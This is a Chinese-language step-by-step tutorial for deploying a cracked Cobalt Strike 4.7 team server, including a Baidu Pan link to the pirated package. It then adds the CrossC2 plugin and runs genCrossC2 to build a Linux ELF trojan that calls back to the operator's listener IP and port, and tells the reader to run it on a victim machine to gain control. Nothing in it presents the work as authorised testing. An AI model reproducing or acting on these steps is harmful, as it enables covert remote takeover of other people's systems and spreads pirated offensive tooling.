环境安装
破解包:[cobalt_strike_4.7](链接: https://pan.baidu.com/s/1c2wxXLiyjz1jvbhCOKHskw?pwd=18kq 提取码: 18kq
–来自百度网盘超级会员v6的分享) (客户端、服务器端,都用这个)
客户端: kali Linux 2021.3
服务端:腾讯云 ubuntu
服务器端
进入cs的目录
cd cobalt_strike_4.7
chmod +x teamserver
chmod +x TeamServerImage
./teamserver 本机ip 密码
服务器端防火墙设置。(自己选定一个端口,作为连接的端口)
默认端口是50050,使用默认端口的话,记得开启50050
# 安装firewall sudo apt-get install firewalld sudo systemctl start firewalld sudo systemctl enable firewalld sudo systemctl status firewalld
# 开放端口 firewall-cmd --zone=public --add-port=端口号/tcp --permanent # 关闭端口 firewall-cmd --zone=public --remove-port=端口号/tcp --permanent # 配置生效 firewall-cmd --reload # 查看所有开放的端口 firewall-cmd --zone=public --list-ports # 关闭防火墙 systemctl stop firewalld.service # 查看防火墙状态 firewall-cmd --state # 查看监听的端口 netstat -lnpt # 检查端口被哪个进程占用 netstat -lnpt |grep 端口号 # 查看进程的详细信息 ps 端口号 # 中止进程 kill -9 端口号
客户端
进入 Cobalt Strike 目录,执行 ./start.sh
连接成功
受害机上线(Linux) cobalt- strike4.4版本
实验对象为Linux/macOS系统,需要下载插件。
GitHub项目:https://github.com/gloxec/CrossC2
插件安装
CS客户端:下载Release v3.1.0 版本。下载genCrossC2 和CrossC2Kit就行了
将这些文件都放进新建文件夹CrossC2
中,再把CrossC2
文件夹放进cobalt_strike_4.4
文件夹中
CrossC2Kit.zip 后渗透linux的插件
正常加载CS客户端,进入客户端后选择加载脚本,选择CrossC2Kit里面的CrossC2Kit_Loader.cna
加载
复制服务端上cobaltstrike4.4目录下的 .cobaltstrike.beacon_keys到本地目录下。
客户端 ,将.cobaltstrike.beacon_keys
放进CrossC2
文件夹
生成木马
要新建一个监听器,要https的。
需要手动生成木马,CS客户端生成的不好用。
chmod +x genCrossC2.Linux
./genCrossC2.Linux ip 52000 .cobaltstrike.beacon_keys null Linux x64 lovetutu.elf
# 就是./genCrossC2.Linux 监听器的ip 监听器的端口 cs服务器上的那个文件的路径 null Linux x64 木马的路径和名字
然后就会生成可以用的木马啦~
在受害机器上运行木马,就上线了